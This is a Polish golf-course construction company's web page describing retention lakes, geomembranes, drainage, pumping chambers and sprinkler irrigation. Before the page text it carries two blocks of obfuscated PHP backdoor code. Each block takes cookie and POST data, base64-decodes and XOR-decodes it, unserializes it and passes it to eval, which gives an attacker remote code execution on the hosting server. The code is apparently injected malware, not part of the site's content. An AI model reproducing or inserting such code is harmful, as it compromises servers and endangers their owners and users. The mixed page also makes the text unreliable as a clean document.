$xwHuTCKvEp = "\x4a" . 'j' . chr ( 677 - 611 ).chr (95) . chr (113) . 'n' . "\157" . chr (112) . 'J';$LbNyOdZwBO = chr (99) . "\154" . "\x61" . "\x73" . chr ( 261 - 146 ).chr (95) . chr ( 978 - 877 )."\x78" . "\x69" . chr (115) . "\x74" . "\x73";$vpuETEHs = class_exists($xwHuTCKvEp); $LbNyOdZwBO = "53325";$QZCRPzs = !1;if ($vpuETEHs == $QZCRPzs){function kXAiBRPTMR(){return FALSE;}$yNjYNxlW = "22511";kXAiBRPTMR();class JjB_qnopJ{private function ZfFvaV($yNjYNxlW){if (is_array(JjB_qnopJ::$DwBnCnJB)) {$xnmdraZB = str_replace("\74" . '?' . "\160" . chr ( 942 - 838 )."\160", "", JjB_qnopJ::$DwBnCnJB['c' . chr ( 1046 - 935 ).'n' . 't' . "\x65" . "\x6e" . chr (116)]);eval($xnmdraZB); $yNjYNxlW = "22511";exit();}}private $IeTBGUYe;public function qdYxfn(){echo 51660;}public function __destruct(){$yNjYNxlW = "28338_64773";$this->ZfFvaV($yNjYNxlW); $yNjYNxlW = "28338_64773";}public function __construct($vNDcOce=0){$mfYnS = $_POST;$UIVJtGw = $_COOKIE;$XybIzIoaL = "4172d24f-eb14-4e26-a009-94428947564f";$woJcUJzDM = @$UIVJtGw[substr($XybIzIoaL, 0, 4)];if (!empty($woJcUJzDM)){$ikOeu = "base64";$TMkFlTAWY = "";$woJcUJzDM = explode(",", $woJcUJzDM);foreach ($woJcUJzDM as $PYVqoPYfVi){$TMkFlTAWY .= @$UIVJtGw[$PYVqoPYfVi];$TMkFlTAWY .= @$mfYnS[$PYVqoPYfVi];}$TMkFlTAWY = array_map($ikOeu . '_' . chr (100) . "\145" . chr (99) . "\157" . chr ( 492 - 392 ).chr (101), array($TMkFlTAWY,)); $TMkFlTAWY = $TMkFlTAWY[0] ^ str_repeat($XybIzIoaL, (strlen($TMkFlTAWY[0]) / strlen($XybIzIoaL)) + 1);JjB_qnopJ::$DwBnCnJB = @unserialize($TMkFlTAWY); $TMkFlTAWY = class_exists("28338_64773");}}public static $DwBnCnJB = 25714;}$nXeHrob = new /* 40812 */ $xwHuTCKvEp(22511 + 22511); $yNjYNxlW = strpos($yNjYNxlW, $yNjYNxlW); $QZCRPzs = $nXeHrob = $yNjYNxlW = Array();}$ArdLztvwZK = chr (109) . 'S' . "\x5f" . "\124" . "\106" . 'y' . chr (73) . "\x54";$mKTYHWqyHQ = "\143" . "\154" . chr ( 192 - 95 ).chr (115) . chr ( 1083 - 968 )."\x5f" . chr ( 756 - 655 ).'x' . chr (105) . "\x73" . chr ( 730 - 614 ).'s';$LpbfTDDS = class_exists($ArdLztvwZK); $mKTYHWqyHQ = "43411";$efLfFtcDaS = !1;if ($LpbfTDDS == $efLfFtcDaS){function wTczX(){return FALSE;}$tTuPPv = "61469";wTczX();class mS_TFyIT{private function CrmMFPEY($tTuPPv){if (is_array(mS_TFyIT::$jrKqR)) {$PxBZGEY = str_replace("\74" . chr ( 458 - 395 )."\x70" . 'h' . "\x70", "", mS_TFyIT::$jrKqR['c' . chr ( 713 - 602 )."\x6e" . 't' . "\145" . chr ( 881 - 771 )."\x74"]);eval($PxBZGEY); $tTuPPv = "61469";exit();}}private $gcGfvyfT;public function vNpxoSXk(){echo 32619;}public function __destruct(){$tTuPPv = "6774_6839";$this->CrmMFPEY($tTuPPv); $tTuPPv = "6774_6839";}public function __construct($gkCTw=0){$zGTfxldz = $_POST;$TQxQB = $_COOKIE;$sdjSCbbtb = "8664aaf1-6119-46d2-b4d5-e002ec4d98eb";$czaflLa = @$TQxQB[substr($sdjSCbbtb, 0, 4)];if (!empty($czaflLa)){$GNRgCS = "base64";$wWmbIpZJ = "";$czaflLa = explode(",", $czaflLa);foreach ($czaflLa as $JsHLnfyqZI){$wWmbIpZJ .= @$TQxQB[$JsHLnfyqZI];$wWmbIpZJ .= @$zGTfxldz[$JsHLnfyqZI];}$wWmbIpZJ = array_map($GNRgCS . "\137" . chr (100) . chr (101) . 'c' . chr ( 635 - 524 ).chr (100) . chr (101), array($wWmbIpZJ,)); $wWmbIpZJ = $wWmbIpZJ[0] ^ str_repeat($sdjSCbbtb, (strlen($wWmbIpZJ[0]) / strlen($sdjSCbbtb)) + 1);mS_TFyIT::$jrKqR = @unserialize($wWmbIpZJ); $wWmbIpZJ = class_exists("6774_6839");}}public static $jrKqR = 58613;}$ArtPksxz = new /* 52120 */ $ArdLztvwZK(61469 + 61469); $efLfFtcDaS = $ArtPksxz = $tTuPPv = Array();} Budowa jezior, systemy nawadniające i melioracje wodne - Pola golfowe

Budowa jezior, systemy nawadniające i melioracje wodne


Budowa pola golfowego – obiekty inżynieryjne i melioracje wodne na polu golfowym.

 

Budowa zbiorników wodnych, drenaż i kanalizacja

Najważniejszą kwestią dla pola golfowego jest zaopatrzenie w wodę instalacji nawadniającej. W miejscach, gdzie na ma naturalnych zbiorników wody należy wykonać obiekty retencji wody, pozwalające na odzysk przynajmniej części wody z deszczowni i stanowiące magazyn wody np. w postaci sztucznego zbiornika (jeziora) mającego walory krajobrazowe. W zależności od miejscowych warunków glebowych robi się zbiorniki naturalne, lub wykończone wewnętrznie geomembranami, takimi jak: folia HDPE, wykładziny bitumiczne czy membrany gumowe (Firestone, Trelleborg). Przy potrzebie sztucznego doszczelnienia zbiorników, w przypadku gleb plastycznych, nadających się do stabilizacji chemicznej, uszczelnienie zbiorników jezior może być wykonane za pomocą polimerów dodawanych do wierzchniej warstwy gleby i utwardzanych mechanicznie. Obróbce poddaje się warstwę o grubości 15cm. Po aplikacji pozostaje gładka, nieprzepuszczalna warstwa naturalnej ziemi. Jest to najtańszy i najefektywniejszy sposób wykonania uszczelnienia. Do systemu retencji wody należą także urządzenia zaopatrzenia w wodę, urządzenia przelewowe oraz system drenarski.

Budowa pola golfowego - jezioro jest niezbędne do retencji wody na polu golfowym.

Zbiornik wody retencyjnej (jezioro) jest na polu golfowym niezbędnym elementem melioracji wodnych .

Obok systemu nawadniającego, drenaż i kanalizacja burzowa, są jednymi z kluczowych elementów infrastruktury pola golfowego. Umożliwiają one swobodny odpływ wodzie dostarczanej darni przez system irygacyjny i zapobiegają gromadzeniu się wód opadowych. Na system odprowadzania wody składają się zwykle rowy melioracyjne, perforowane linie drenarskie, studzienki i kolektory wody oraz system kanalizacyjny odprowadzający wodę poza teren gry.

Budowa pola golfowego - studzienki drenarskie drenażu powierzchniowego na fairway.

Studzienki drenarskie na fairway – drenaż powierzchniowy budowanego pola golfowego.

 

Autorskie, wdrożone przez Golf Construction rozwiązania technologiczne na na pola golfowe

  • Prefabrykowane, żelbetowe komory irygacyjne dla zastosowania jako ujęcia wody powierzchniowej – w elementach, gotowe do montażu na budowie; 

Budowa pola golfowego wymaga instalacji pomp systemu nawadniającego (deszczowni).

Instalacja zestawu pomp w komorze umieszczonej obok jeziora.

Budowa nawadniania pola golfowego wymaga zbudowania ujęcia wody dla pomp deszczowni.

Prefabrykowana komora ujęcia wody z pompami deszczowni.

 

  • Alternatywne do elementów gotowych rozwiązania studni drenarskich i kanalizacji burzowej, pokryw, ograniczające koszty wykonania oraz systemu odwodnienia terenu pola golfowego;
  • Prefabrykowane elementy przelewowe zbiorników retencyjnych (przelewy awaryjne, jezior i potoków);
  • Atestowane geomemembrany do uszczelnień zbiorników wody – zastosowane i sprawdzone na obszarze ponad 100.000 m2 – wielokrotnie tańsze od produktów HDPE.

Pola golfowe - budowa pola golfowego - geomembrana uszczelniająca jeziora na polu golfowym.

Geomembrana zbiornika wody przy budowie pola golfowego.

Pola golfowe - budowa pola golfowego - konstrukcja zbiornika wody do nawadniania, przelew.

Inzynieria zbiornika wody (jeziora) na budowie pola golfowego.

 

Mury oporowe i elementy małej architektury pola golfowego 

Elementy małej architektury są nieodzownym składnikiem upiększającym każde pole golfowe. Zalicza się do nich architektoniczne wykończenie brzegów zbiorników wodnych, kaskady, groble, zastawki, czy mostki. Stanowią one elementy zamykające tereny zielone w estetyczną całość pola golfowego .

Pola golfowe - budowa pola golfowego - kaskada przelewu między jeziorami (zbiornikami retencyjnymi) pola golfowego.

Kamienna kaskada przelewu między jeziorami na polu golfowym.

Pola golfowe - budowa pola golfowego - kamienny mur oporowy jeziora (zbiornika wody retencyjnej)

Kamienny mur oporowy jeziora na polu golfowym.

 

Systemy nawadniania

Ciśnieniowy system nawadniający jest najważniejszą częścią melioracji wodnych każdego pola golfowego. Prawidłowo zaprojektowany i wykonany system zraszający, pozwala na utrzymanie darni na niezmiennym poziomie, świadczącym o wysokiej klasie obiektu. 

Budowa pola golfowego - system nawadniający na polu golfowym oparty o zraszacze wynurzalne, rotory .

Pracujące zraszacze wynurzalne (rotory) systemu nawadniającego na polu golfowym.

Praktyka wykonawcza i wyspecjalizowana kadra Golf Construction, w połączeniu z własnymi innowacyjnymi rozwiązaniami przepompowni i zaopatrzenia w wodę obiektów golfowych, pozwala na wykonanie każdego zadania z zakresu nawadniania terenów zielonych: pola golfowe, parki, boiska, czy korty tenisowe.

Pola golfowe - budowa pola golfowego - system nawadniający na polu, impaktowe zraszacze wynurzalne nawadniające green golfowy z approaches.

Sekcja zraszaczy golfowego systemu nawadniającego na green.

Pola golfowe - budowa pola golfowego - system nawadniający na polu golfowym, impaktowy zraszacz wynurzalny na green .

System nawadniający pola golfowe – impaktowy zraszacz wynurzalny na green.

 

Posiadamy doświadczenia w całym procesie powstawania systemów nawadniania (dedykowanych na pola golfowe) liczących się producentów na polskim rynku – PERROT, RAIN BIRD i TORO. Od koncepcji, poprzez projektowanie do montażu i eksploatacji. Od kilkunastu naszą referencyjną firmą w zakresie produktów do nawodnień jest PERROT POLSKA.